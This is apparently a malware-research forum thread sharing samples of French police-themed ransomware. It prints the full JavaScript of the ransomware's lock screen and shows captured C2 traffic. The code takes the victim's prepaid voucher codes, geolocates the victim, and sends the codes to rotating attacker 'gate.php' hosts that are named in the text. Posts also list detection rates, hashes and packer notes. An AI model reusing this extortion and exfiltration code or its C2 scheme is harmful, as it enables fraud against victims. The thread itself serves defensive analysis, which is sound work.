
 #10301  by Xylitol
 Sun Dec 11, 2011 9:14 pm
Two French versions in the attachment.

27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597

6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279


/*
* Global variables 
 */
// Build switches: `debug` selects the test gate list below, `debug_ec` turns on
// the console.log tracing used throughout this file. Both are off in this sample.
var debug = false;
var debug_ec = false;

// Debug builds pre-fill the hidden "v3" field (read by set_userid) so the gate
// selector does not wait for a real userid.
if (debug || debug_ec)
{
    alert("DEBUG! DEBUG! DEBUG!");
    document.getElementById("v3").value = "1";
}

// Minimum voucher total (EUR) demanded before send_vouchers() queues a report.
var penalty_amount = 200;
// Campaign tag and per-victim id; both travel as query parameters on every
// gate request (see select_gate and send_report). g_userid is filled from the
// hidden "v3" field by set_userid(), g_os_version by set_os_version().
var g_botnet = "fr1";
var g_os_version = "Unknown";
var g_userid = "0";

// Replies expected from a gate (RESPONSE_PONG for cmd=ping, RESPONSE_OK for
// cmd=data) and the French messages shown to the victim by send_vouchers().
var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

// Gate (C2) URL lists, assigned as implicit globals. The production list is
// rotated by select_gate() whenever the current gate stops answering; these
// hostnames, together with the gate.php?cmd=ping / cmd=data query pattern,
// are the network indicators to look for in proxy and DNS logs.
if (debug)
{
    g_gates = [
        "http://lck-test.net/gate.php",
        "http://lck-test4.net/gate.php", // not exists
        "http://lck-test1.net/gate.php",
        "http://lck-test2.net/gate.php",
        "http://lck-test3.net/gate.php"
        ]
}
else
{
    g_gates = [
		"http://bundespol.com/gate.php",
        "http://yycqparxvohd.com/gate.php",
        "http://wzuoqliyknpz.com/gate.php"
        ]
}

// Number of voucher rows currently present in the penalty form.
var positions_count = 1;

// Shared state for the 1-second monitor() loop: *_lock flags guard in-flight
// HTTP requests, *_set flags mark one-time initialisation steps.
var g_state = new Object();
g_state.geo_location_lock = false;
g_state.geo_location_set = false;
g_state.report_lock = false;
g_state.report = "";
g_state.report_sent = true; // nothing pending until send_vouchers() stores a report
g_state.gate_selector_lock = false;
g_state.gate_selector_gate_works = true;
// Starting above the 3600 threshold tested in select_gate() forces a gate ping
// on the very first monitor() tick.
g_state.gate_selector_calls_count = 999999;
g_state.gate_selector_gate_index = 0;
g_state.os_version_set = false;
g_state.userid_set = false;

// Base64 alphabets (64 symbols + '=' pad), again implicit globals. The standard
// one encodes the OS name in the ping request's `os=` parameter; the "private"
// one (digits first, then a-z, A-Z) encodes the voucher report in `cmd=data`
// requests. A captured report decodes with that same table.
g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";

/*
 * Debug-only dump of every g_state flag to the console; a no-op unless
 * debug_ec is set. Reads the globals g_state, g_gates and debug_ec.
 */
function print_g_state()
{
    if (!debug_ec) return;

    var yesno = function(flag) { return flag ? "true" : "false"; };
    var gate_idx = g_state.gate_selector_gate_index;

    console.log("dump of g_state:");
    console.log("\tg_state.geo_location_lock: %s", yesno(g_state.geo_location_lock));
    console.log("\tg_state.geo_location_set: %s", yesno(g_state.geo_location_set));
    console.log("\tg_state.report_lock: %s", yesno(g_state.report_lock));
    console.log("\tg_state.report: %s", g_state.report);
    console.log("\tg_state.report_sent: %s", yesno(g_state.report_sent));
    console.log("\tg_state.gate_selector_lock: %s", yesno(g_state.gate_selector_lock));
    console.log("\tg_state.gate_selector_gate_works: %s", yesno(g_state.gate_selector_gate_works));
    console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
    console.log("\tg_state.gate_selector_gate_index: %d (%s)", gate_idx, g_gates[gate_idx]);
    console.log("===================================================================================================");
}

/*
 * Base64-encodes `input` (each character taken as its UTF-16 code unit) with
 * the 65-character alphabet `key` (64 symbols followed by the pad symbol).
 * With g_base64_std_key the result is ordinary base64, e.g. "Windows XP" ->
 * "V2luZG93cyBYUA=="; with g_base64_priv_key it is a symbol-substituted
 * variant. Code units above 255 are not masked and produce out-of-range
 * lookups into `key` (empty output symbols).
 */
function base64_encode(input, key)
{
    var symbols = [];
    var pos = 0;
    var len = input.length;

    while (pos < len)
    {
        var b1 = input.charCodeAt(pos++);
        var b2 = input.charCodeAt(pos++); // NaN past the end of input
        var b3 = input.charCodeAt(pos++);

        var s1 = b1 >> 2;
        var s2 = ((b1 & 3) << 4) | (b2 >> 4);
        var s3 = isNaN(b2) ? 64 : (((b2 & 15) << 2) | (b3 >> 6));
        var s4 = (isNaN(b2) || isNaN(b3)) ? 64 : (b3 & 63);

        symbols.push(key.charAt(s1), key.charAt(s2), key.charAt(s3), key.charAt(s4));
    }

    return symbols.join("");
}

/*
 * Tab switcher for the two-tab lock screen. Marks `content_tab_id` as the open
 * tab header and `content_id` as the visible panel; the other header/panel pair
 * ('vouchers_info_tab'/'vouchers_info', 'penalty_form_tab'/'penalty_form') is
 * closed and hidden.
 */
function switch_tab(content_tab_id, content_id)
{
    var byId = function(id) { return document.getElementById(id); };
    var headers = ['vouchers_info_tab', 'penalty_form_tab'];
    var panels = ['vouchers_info', 'penalty_form'];
    var k;

    for (k = 0; k < headers.length; k++) byId(headers[k]).className = 'close';
    byId(content_tab_id).className = 'open';

    for (k = 0; k < panels.length; k++) byId(panels[k]).style.display = 'none';
    byId(content_id).style.display = 'block';
}


/*
* Text input filter
*/

// Registers init() to run once the document has loaded (addEventListener, or
// attachEvent on legacy IE). This is independent of the window.onload
// assignment further down, which starts the monitor() timer, so both should run.
(function()
{   // after loading document init function will be called
    if (window.addEventListener)
        window.addEventListener("load", init, false);
    else if (window.attachEvent)
        window.attachEvent("onload", init);

})();

/*
 * Installs filter() as the keypress handler of the input element `id`
 * (addEventListener when available, legacy onkeypress property otherwise).
 */
function register_handler(id)
{
    if (!id.addEventListener)
    {
        id.onkeypress = filter;
        return;
    }
    id.addEventListener("keypress", filter, false);
}

// Load-time hook: attaches the keypress filter to every <input type="text">
// that carries an 'allowed' attribute; all other inputs are left untouched.
function init()
{
    var fields = document.getElementsByTagName("input");
    for (var n = 0; n < fields.length; n++)
    {
        var field = fields[n];
        // only text fields, and only those declaring a character whitelist
        var filtered = field.type == "text" && field.getAttribute("allowed");
        if (filtered) register_handler(field);
    }
}

// Keypress handler installed by register_handler() on every text field with an
// 'allowed' attribute. Accepts a key only if the typed character is in that
// attribute's whitelist (e.g. '0123456789' on the voucher fields) and switches
// the field's class between its 'successclass' and 'errorclass' attributes.
// `this` is the input element; returns true to accept the key, false to block it.
function filter(event)
{
    // Get event object and character code by portable way
    var e = event || window.event; // Keyboard event object
    var code = e.charCode || e.keyCode; // What key pressed

    // If pressed functional key do not filter it
    if (e.charCode == 0) return true; // Functional key (FF only)
    if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
    if (code < 32) return true; // ctrl ASCII code

    // Now get information from input element
    var allowed = this.getAttribute("allowed"); // Allowed characters
    var errorClassName = this.getAttribute("errorclass"); // class name indicating error
    var successClassName = this.getAttribute("successclass"); // class name indicating success

    // Translate key code to character
    var c = String.fromCharCode(code);

    // Check whether character in allowed characters list or not
    if (allowed.indexOf(c) != -1)
    {
        // character c is allowed
        this.className = successClassName;
        return true; // Accept input
    }
    else
    {
        // character c is not allowed
        this.className = errorClassName;
        // Prevent input
        if (e.preventDefault) e.preventDefault();
        if (e.returnValue) e.returnValue = false; // only assigned when returnValue is already truthy
        return false;
    }
}

/*
* End of text input filter
 */



/*
* penalty form support code
 */
/*
 * Cell text for a voucher row: the 1-based row number as a string
 * (position_number is coerced to a number first, so "3" and 3 both give "4").
 */
function get_position_number_html(position_number)
{
    var one_based = Number(position_number) + 1;
    return String(one_based);
}

/*
 * HTML for the voucher-code input of row `position_number`: digits only
 * (allowed='0123456789'), at most 19 characters, id 'voucher_code<n>'.
 */
function get_voucher_code_html(position_number)
{
    var attrs = [
        "id='voucher_code" + position_number + "'",
        "type='text'",
        "size='25'",
        "maxlength='19'",
        "allowed='0123456789'",
        "errorclass='errborder'",
        "successclass='goodborder'",
        "class='goodborder'"
    ];
    return "<input " + attrs.join(" ") + ">";
}

/*
 * HTML for the voucher-value input of row `position_number`: digits only, at
 * most 3 characters, default '0', id 'voucher_value<n>'; every keyup recomputes
 * the total via refresh_total().
 */
function get_voucher_value_html(position_number)
{
    var attrs = [
        "id='voucher_value" + position_number + "'",
        "type='text'",
        "size='14'",
        "maxlength='3'",
        "value='0'",
        "allowed='0123456789'",
        "errorclass='errborder'",
        "successclass='goodborder'",
        "class='goodborder'",
        "onkeyup='refresh_total()'"
    ];
    return "<input " + attrs.join(" ") + ">";
}

/*
 * HTML for the "remove row" icon of row `position_number`. The first row
 * (position 0, or anything non-positive) gets no icon and cannot be deleted.
 */
function get_img_minus_html(position_number)
{
    if (position_number <= 0)
    {
        return "";
    }
    var onclick = "delete_voucher_position(" + position_number + ")";
    return "<img src='minus.png' alt='' onclick='" + onclick + "'>";
}

/*
 * Appends one empty voucher row (row number, code field, value field, delete
 * icon) to the 'penalty' table (document.all is IE-only) and wires the
 * keypress filter onto the two new inputs. Increments the global
 * positions_count.
 */
function add_voucher_position()
{
    var row_no = positions_count++;
    var cell_html = [
        get_position_number_html(row_no),
        get_voucher_code_html(row_no),
        get_voucher_value_html(row_no),
        get_img_minus_html(row_no)
    ];

    var row = document.all.penalty.insertRow(row_no + 1);
    for (var c = 0; c < cell_html.length; c++)
    {
        row.insertCell(c).innerHTML = cell_html[c];
    }

    register_handler(document.getElementById("voucher_code" + row_no));
    register_handler(document.getElementById("voucher_value" + row_no));
}

/*
 * Removes voucher row `position_number` from the 'penalty' table. Instead of
 * deleting a single row it snapshots the code/value of every other row, deletes
 * all data rows, rebuilds positions_count-1 fresh rows with contiguous element
 * ids, restores the saved values, re-registers the keypress filter and rewrites
 * 'total_amount'. Mutates the global positions_count.
 */
function delete_voucher_position(position_number)
{
    var i, j;
    var vouchers = new Array();
    var values = new Array();
    var total_amount;

    // snapshot every row except the one being removed (compacted into j)
    for(i = 0, j = 0; i < positions_count; i++)
    {
        if (i != position_number)
        {
            vouchers[j] = document.getElementById("voucher_code"+i).value;
            values[j] = document.getElementById("voucher_value"+i).value;
            j++;
        }
    }

    // delete all data rows; always index 1 because rows shift up after each
    // delete (presumably row 0 is the table header - see insertRow(i + 1))
    for(i = 0; i < positions_count; i++)
    {
        document.all.penalty.deleteRow(1);
    }
    
    positions_count--;

    // rebuild the remaining rows so that element ids are 0..positions_count-1 again
    for(i = 0; i < positions_count; i++)
    {
        var newrow = document.all.penalty.insertRow(i + 1);
        var newcell = newrow.insertCell(0);
        newcell.innerHTML = get_position_number_html(i);
        newcell = newrow.insertCell(1);
        newcell.innerHTML = get_voucher_code_html(i);
        newcell = newrow.insertCell(2);
        newcell.innerHTML = get_voucher_value_html(i);
        newcell = newrow.insertCell(3);
        newcell.innerHTML = get_img_minus_html(i);
    }

    // restore the snapshot into the fresh inputs and re-attach filter()
    for(i = 0; i < positions_count; i++)
    {
        document.getElementById("voucher_code"+i).value = vouchers[i];
        document.getElementById("voucher_value"+i).value = values[i];
        register_handler(document.getElementById("voucher_code"+i));
        register_handler(document.getElementById("voucher_value"+i));
    }

    // recompute the total from the saved values (same arithmetic as refresh_total)
    total_amount = 0;
    for(i = 0; i < positions_count; i++)
    {
        total_amount += values[i] * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    return;
}

/*
 * Sums the numeric value of every 'voucher_value<n>' field, writes the sum into
 * 'total_amount' and returns it. The 'do_pay' button is always left enabled
 * here (the commented-out threshold check was moved to send_vouchers(), which
 * compares the returned total against penalty_amount).
 */
function refresh_total()
{
    var sum = 0;
    for (var idx = 0; idx < positions_count; idx++)
    {
        var field = document.getElementById("voucher_value" + idx);
        sum += Number(field.value);
    }
    document.getElementById("total_amount").innerHTML = sum;

    // pay button is never disabled by the total
    document.getElementById("do_pay").disabled = '';

    return sum;
}

/*
* End of penalty form support code
 */


/*
* Geoip code
 */
/*
 * Returns a new XMLHttpRequest, or on legacy IE the first MSXML ActiveX object
 * (newest ProgID first) that can be instantiated. Returns undefined when
 * neither mechanism is available.
 */
function http_new_request()
{
    if (typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    if (!window.ActiveXObject)
    {
        return;
    }

    var progIds = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
    for (var k = 0; k < progIds.length; k++)
    {
        try
        {
            return new ActiveXObject(progIds[k]);
        }
        catch (ignored)
        {
            // ProgID not registered on this machine; try the next one
        }
    }
}

/*
 * Asynchronous GET of `target`; calls callback(responseText) on HTTP 200.
 * options: { timeout (ms), timeoutHandler(target), errorHandler(status, statusText) }.
 * On a non-200 status the errorHandler runs if provided, otherwise callback(null).
 * With `timeout` set the request is aborted after that delay and timeoutHandler
 * runs. Exceptions from open()/send() are swallowed, so a blocked or malformed
 * URL produces no callback at all - callers rely on their own lock flags.
 */
function http_get(target, callback, options)
{
    var request = http_new_request();
    var timer;

    if (options.timeout)
    {
        timer = setTimeout(
            function()
            {
                request.abort();
                if (options.timeoutHandler)
                    options.timeoutHandler(target);
            },
            options.timeout
            )
    }

    request.onreadystatechange = function()
    {
        if (request.readyState == 4) // DONE
        {
            if (timer) clearTimeout(timer);
            if (request.status == 200)
            {
                callback(request.responseText);
            }
            else
            {
                // NOTE(review): abort() from the timer above typically also reaches
                // readyState 4 with status 0, so this branch may run after a timeout - confirm
                if (options.errorHandler) options.errorHandler(request.status, request.statusText);
                else callback(null);
            }
        }
    }

    try
    {
        request.open("GET", target, true);
        request.send(null);
    }

    catch (e) {
    }
}

/*
 * One-shot lookup of the victim's public IP, ISP and city, scraped with three
 * regexes from the HTML of http://tools.ip2location.com/ib2/ (a legitimate
 * third-party lookup page) and written into the 'v_ip', 'v_city' and 'v_isp'
 * elements of the lock screen. Guarded by g_state.geo_location_set /
 * geo_location_lock with a 3 s timeout; on any failure the lookup is retried on
 * the next monitor() tick. This request is the first network activity listed
 * in the captured traffic on this page.
 */
function set_geo_location()
{
    var options = new Object();

    function cb_set_geo_location(response_text)
    {
        try
        {
            if (response_text == null)
            {
                g_state.geo_location_set = false;
            }
            else
            {
                // scrape the "Your IP Address ... <b>x</b>" style fragments of the page
                var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
                var s_ip = response_text.match(re)[2].toString();
                re = /ISP:(.*?)<b>(.*?)<\/b>/i;
                var s_isp = response_text.match(re)[2].toString();
                re = /City:(.*?)<b>(.*)<\/b>/i;
                var s_city = response_text.match(re)[2].toString();
                // hard-coded fallback address displayed when the scrape yields an empty IP
                if (s_ip == "")
                {
                    s_ip = "188.28.11.121";
                }
                document.getElementById("v_ip").innerHTML = s_ip;
                document.getElementById("v_city").innerHTML = s_city;
                document.getElementById("v_isp").innerHTML = s_isp;
                g_state.geo_location_set = true;
            }
        }

        // a regex that does not match makes match() return null and throws here;
        // geo_location_set stays false so the lookup is retried
        catch (e) {}

        finally
        {
            g_state.geo_location_lock = false;
        }
    }

    function cb_set_geo_location_timeout(target)
    {
        g_state.geo_location_set = false;
        g_state.geo_location_lock = false;
    }

    if (!g_state.geo_location_set && !g_state.geo_location_lock)
    {
        g_state.geo_location_lock = true;
        options.timeout = 3000;
        options.timeoutHandler = cb_set_geo_location_timeout;
        http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
    }
}

/*
 * Gate (C2) health check / beacon, driven by monitor() once userid_set is true.
 * Sends GET <gate>?cmd=ping&botnet=<g_botnet>&userid=<g_userid>&os=<base64 OS>
 * to the current gate and expects the body "Pong!" (RESPONSE_PONG). A ping is
 * issued when the gate is flagged dead or every 3600 calls (about one hour at
 * the 1 s monitor interval); a dead gate first advances the selector to the
 * next entry of g_gates (round robin). The captured requests on this page show
 * exactly this query string, with os=V2luZG93cyBYUA== ("Windows XP").
 */
function select_gate()
{
    var options = new Object();
    
    function cb_select_gate(response_text)
    {
        if (response_text == RESPONSE_PONG)
        {
            g_state.gate_selector_gate_works = true;
            g_state.gate_selector_calls_count = 0; // restart the hourly timer
            if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            // any other body (or callback(null) on non-200) marks the gate dead
            g_state.gate_selector_gate_works = false;
            if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.gate_selector_lock = false;
    }

    function cb_select_gate_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.gate_selector_lock = false;
        if (debug_ec) console.log("Pinging gate %s was timeout."); // no argument supplied for %s
    }

    if (!g_state.gate_selector_lock && g_state.userid_set)
    {
        if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
        {
            g_state.gate_selector_lock = true;
            if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);

            // rotate to the next gate only when the current one failed
            if (!g_state.gate_selector_gate_works)
            {
                g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
            }

            options.timeout = 5000;
            options.timeoutHandler = cb_select_gate_timeout;
            // OS name uses the standard base64 alphabet (unlike the report)
            var os_version = base64_encode(g_os_version, g_base64_std_key);
            http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
        }
    }
}

/*
 * Exfiltrates the voucher report prepared by send_vouchers(). When a report is
 * pending (report_sent false) and the current gate is believed alive, sends
 * GET <gate>?cmd=data&botnet=<g_botnet>&userid=<g_userid>&report=<encoded report>
 * and expects the body "OK" (RESPONSE_OK). Any other reply, or a 5 s timeout,
 * flags the gate as dead (so select_gate() rotates) and re-queues the report.
 * The `report=` value is base64 with g_base64_priv_key; the one captured on
 * this page, c34Ncj4Ncj4Ncj4Ncj4NciQOc30=, decodes to "0111111111111111-200".
 */
function send_report()
{
    var options = new Object();
    
    function cb_send_report(response_text)
    {
        if (response_text != RESPONSE_OK)
        {
            g_state.gate_selector_gate_works = false;
            g_state.report_sent = false; // retry on the next gate
            if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.report_lock = false;
    }

    function cb_send_report_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.report_lock = false;
        // NOTE: report_sent is left true here, so a timed-out report is not retried
        // unless send_vouchers() stores a different report
        if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
    }

    if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
    {
        g_state.report_lock = true;
        if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        // set 'report_sent = true' here to prevent overwriting this flag in
        // moment between changing report value and calling cb_send_report()
        g_state.report_sent = true;
        options.timeout = 5000;
        options.timeoutHandler = cb_send_report_timeout;
        http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
    }
}

/*
 * Derives a display name for the victim's Windows version from
 * navigator.userAgent (first matching token wins, in list order), stores it in
 * g_os_version, shows it in 'v_os' and marks g_state.os_version_set. Runs once;
 * an unrecognised agent yields "". The name is what select_gate() base64-encodes
 * into the `os=` parameter of the ping request.
 */
function set_os_version()
{
    if (g_state.os_version_set) return;

    var ua_token_to_name = [
        ["Windows 95", "Windows 95"],
        ["Windows NT 4", "Windows NT 4.0"],
        ["Windows 98", "Windows 98"],
        ["Win 9x 4.9", "Windows ME"],
        ["Windows NT 5.0", "Windows 2000"],
        ["Windows NT 5.1", "Windows XP"],
        ["Windows NT 6.1", "Windows Seven"],
        ["Windows NT 5.2", "Windows 2003"],
        ["Windows NT 6.0", "Windows Vista"]
    ];
    var agent = navigator.userAgent;
    var name = "";

    for (var k = 0; k < ua_token_to_name.length; k++)
    {
        if (agent.indexOf(ua_token_to_name[k][0]) > -1)
        {
            name = ua_token_to_name[k][1];
            break;
        }
    }

    g_os_version = name;
    document.getElementById("v_os").innerHTML = name;
    g_state.os_version_set = true;
    if (debug_ec) console.log("OS version set successfully.");
}

/*
 * Copies the hidden 'v3' field into g_userid (the per-victim id sent on every
 * gate request). userid_set is raised only once the field holds something other
 * than "0"; that flag is what lets select_gate() start beaconing. Runs until set.
 */
function set_userid()
{
    if (g_state.userid_set) return;

    var id = document.getElementById("v3").value;
    g_userid = id;
    if (id == "0") return; // placeholder value, keep polling

    g_state.userid_set = true;
    if (debug_ec) console.log("Userid set successfully.");
}

/*
 * One tick of the 1 s heartbeat started by window.onload: refreshes the total,
 * runs the one-shot initialisers (geo lookup, OS name, userid) and then the
 * gate ping / report-sending state machine, in that fixed order.
 */
function monitor()
{
    var steps = [
        refresh_total,
        set_geo_location,
        set_os_version,
        set_userid,
        select_gate,
        send_report
    ];
    for (var s = 0; s < steps.length; s++)
    {
        steps[s]();
    }
}

// Starts the 1 s heartbeat that drives the UI refresh and the gate beacon state
// machine (see monitor()). Assigned as a property, so it does not displace the
// addEventListener("load", init) registration made earlier in the file.
window.onload = function ()
{
    setInterval(monitor, 1000);
}

/*
 * Client-side format check of every voucher code field: a 19-character code
 * must start with "633718", a 16-character code must start with "0" (these
 * look like Ukash and paysafecard PIN formats respectively - not stated in the
 * code). Each field's class is set to its successclass or errorclass attribute.
 * Returns true only if every code passes.
 * NOTE: is_valid is never reset inside the loop, so once one code fails every
 * later field is also shown with errorclass.
 */
function are_vouchers_valid()
{
    var prefix;
    var is_valid = true;
    var ret = true;

    for(var i = 0; i < positions_count; i++)
    {
        var voucher_code = document.getElementById("voucher_code"+i);
        var voucher = voucher_code.value;
        if (voucher.length == 19)
        {
            prefix = voucher.substr(0, 6);
            if (prefix != "633718")
            {
                is_valid = false;
            }
        }
        else if (voucher.length == 16)
        {
            prefix = voucher.substr(0, 1);
            if (prefix != "0")
            {
                is_valid = false;
            }
        }
        else
        {
            is_valid = false;
        }

        if (is_valid)
        {
            voucher_code.className = voucher_code.getAttribute("successclass");
        }
        else
        {
            voucher_code.className = voucher_code.getAttribute("errorclass");
            ret = false;
        }
    }

    return ret;
}

/*
 * Handler for the pay button. Validates the codes (are_vouchers_valid), enforces
 * the penalty_amount minimum, then serialises the rows as "<code>-<value>"
 * joined by "x", encodes the string with g_base64_priv_key and stores it in
 * g_state.report for send_report() to transmit on the next monitor() tick.
 * Serialised reports of 16 characters or fewer are silently discarded; the
 * "sent" message is shown to the victim in every case that passes validation.
 */
function send_vouchers()
{
    var report = "";

    if (!are_vouchers_valid())
    {
        alert(MSG_WRONG_VOUCHERS);
        return;
    }

    var total = refresh_total();
    if (total < penalty_amount)
    {
        alert(MSG_LOW_TOTAL);
        return;
    }

    // "code0-value0xcode1-value1x..." - plain text before encoding
    for(var i = 0; i < positions_count; i++)
    {
        var voucher = document.getElementById("voucher_code"+i).value;
        var value = document.getElementById("voucher_value"+i).value;
        report += report.length ? "x" : "";
        report += voucher + "-" + value;
    }

    // shorter strings cannot hold even one 16-digit code plus a value
    if (report.length > 16)
    {
        report = base64_encode(report, g_base64_priv_key);
        // only a changed report is queued; an identical resubmission is a no-op
        if (g_state.report != report)
        {
            g_state.report = report;
            g_state.report_sent = false;
            if (debug_ec) console.log("Report updated and wait sending.");
        }
    }

    alert(MSG_VOUCHERS_SENT);
    return;
}
Network activity:
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN 
Network activity:
http://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1

Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM
http://xylibox.blogspot.com/2011/12/fak ... eting.html
I was a little more motivated because it targets my country.
Attachments
pw: infected
(402.65 KiB) Downloaded 141 times
 #10897  by rkhunter
 Sat Jan 07, 2012 3:33 pm
French winlock - Trojan:Win32/Ransom.FL.

13/43 >> 30.2%

Replaces explorer.exe in system root and its copy in dllcache.
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
Attachments
pass:infected
(274.02 KiB) Downloaded 82 times
 #11078  by rkhunter
 Tue Jan 17, 2012 6:18 am
One more French ransom, under UPX

MD5: c19886400c9fc45dbbdd33af8a51ec28

13/43

Replaces explorer.exe and its copy at dllcache.

Image

Requests:
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt
vwbulrzmduks.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
gfnboiygpdti.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
Unpacked (McAfee says this is PWS)
9/43

The archive contains both the original and the unpacked sample.
Attachments
pass: infected
(491.78 KiB) Downloaded 82 times
 #11109  by EP_X0FF
 Wed Jan 18, 2012 11:31 am
rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG
Not really a lack of anything. The closest equivalent to VirTool:Win32/Obfuscator in Dr.Web's bases, for example, is probably Trojan.Packed. Such obfuscation techniques are used on various kinds of malware, so files with this obfuscation may have virtually any purpose. By default they are simply moved to quarantine.
 #11110  by rkhunter
 Wed Jan 18, 2012 11:40 am
EP_X0FF wrote:
rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG
Not really a lack of anything. VirTool:Win32/Obfuscator most related equivalent in Dr.Web bases for example is Trojan.Packed, probably. Such obfuscation techniques are used on various kinds of malware, files with such obfuscation may have virtually any purpose. By default they simple moved to quarantine.
Yes, you're right. But I don't see many such verdicts; I think this "problem" will be solved by MS. It seems to be upx->obfuscation->upx. Probably this packing method is used by BH.